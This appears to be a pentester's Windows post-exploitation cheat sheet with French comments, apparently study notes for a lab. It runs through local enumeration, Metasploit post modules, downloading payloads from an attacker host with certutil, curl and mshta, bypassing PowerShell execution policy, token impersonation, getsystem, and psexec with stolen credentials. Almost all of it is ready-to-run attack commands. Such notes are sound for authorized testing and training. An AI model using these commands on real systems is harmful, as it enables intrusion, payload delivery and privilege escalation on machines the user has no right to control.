Checklist

1- Local Enumeration

• Enumerate System information

cmd> hostname #nom de la VM
cmd> systeminfo #infos systemes windows
cmd> wmic qfe Caption,Description,HotFixId,InstalledOn 
#list Hotfixes by date
PS> Get-HotFix | Select-Object Caption, Description, HotFixId, InstalledOn
#idem mais en PS

meterpreter> show_mount
meterpreter> use post/windows/gather/checkvm
meterpreter> use post/windows/gather/enum_applications
meterpreter> use post/windows/gather/enum_computers
meterpreter> use post/windows/gather/enum_patches

• Enumerate Users

meterpreter> getuid #info sur le user
meterpreter> getprivs #liste privileges du user
msf> use post/windows/gather/win_privs #privileges du user
msf> windows/gather/enum_logged_on_users #user enumeration via metasploit
cmd > whoami /priv #liste privilèges
cmd > net users #liste tous les users
cmd > net user <username>
cmd> net localgroup #liste des groupes locaux
cmd> net localgoup administrators #liste le groupe admin local

• Enumerate Network

cmd> ipconfig
cmd> route print #routing table
cmd> arp -a #table arp
cmd> netstat -ano #listening ports
cmd> netsh advfirewall <command> #listing config Firewall
cmd> schtasks /query /fo LIST  #scheduled tasks
cmd> type c:\\Windows\\System32\\Drivers\\etc\\hosts

• Enumerate Processes & Services

meterpreter> ps
meterpreter> pgrep <process-name>
#shell
cmd> net start #list of started services
cmd> wmic service list brief #list of services
cmd> tasklist /SVC #list of current processes + link to services 

• Automating Local enumeration

#JAWS
[<https://github.com/411Hall/JAWS>](<https://github.com/411Hall/JAWS>)

CMD C:\\temp> powershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

2- File Transfer

python -m http.server 80 #python3 web server on Attacker
python -m SimpleHTTPServer 80 #python2

certutil -urlcache -f http://<attacker_IP>/<filename> payload.exe 
#download from Windows target
curl -o filename http://<attacker_IP>/<filename> payload.exe
# si curl installé

3-Upgrade shells

[<https://zweilosec.github.io/posts/upgrade-windows-shell/>](<https://zweilosec.github.io/posts/upgrade-windows-shell/>)
- socat
- rlwrap
- meterpreter

#payload with HTA app (metasploit)
msf> use exploit/windows/misc/hta_server
# copy payload link and launch on victim
cmd> mshta.exe <http://10.10.0.2:8080/6Nz7aySfPN.hta>

4-PriveEsc

https://github.com/itm4n/PrivescCheck

#metasploit suggester
meterpreter> run post/multi/recon/local_exploit_suggester

#via metasploit
meterpreter> getsytem
meterpreter> migrate <pid>

#Token impersonation
meterpreter> load incognito
meterpreter> list_tokens -u
impersonate_token ATTACKDEFENSE\\\\Administrator

#Powershell sur victim via PriveEsc
cmd> powershell -ep bypass -c ". .\\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT"

#ou bien "load powershell" sur meterpreter puis
meterpreter>powershell_shell
PS> . .\\PowerUp.ps1
PS> InvokeAllChecks

#une fois les credentials obtenus (hash ou clear pwd)
msf>exploit/windows/smb/psexec #via msf

psexec.py Administrator@<Target_IP> #via script python sur attacker

runas.exe /user:administrator cmd #sur cible windows 'se connecter en tant que'

Bypass UAC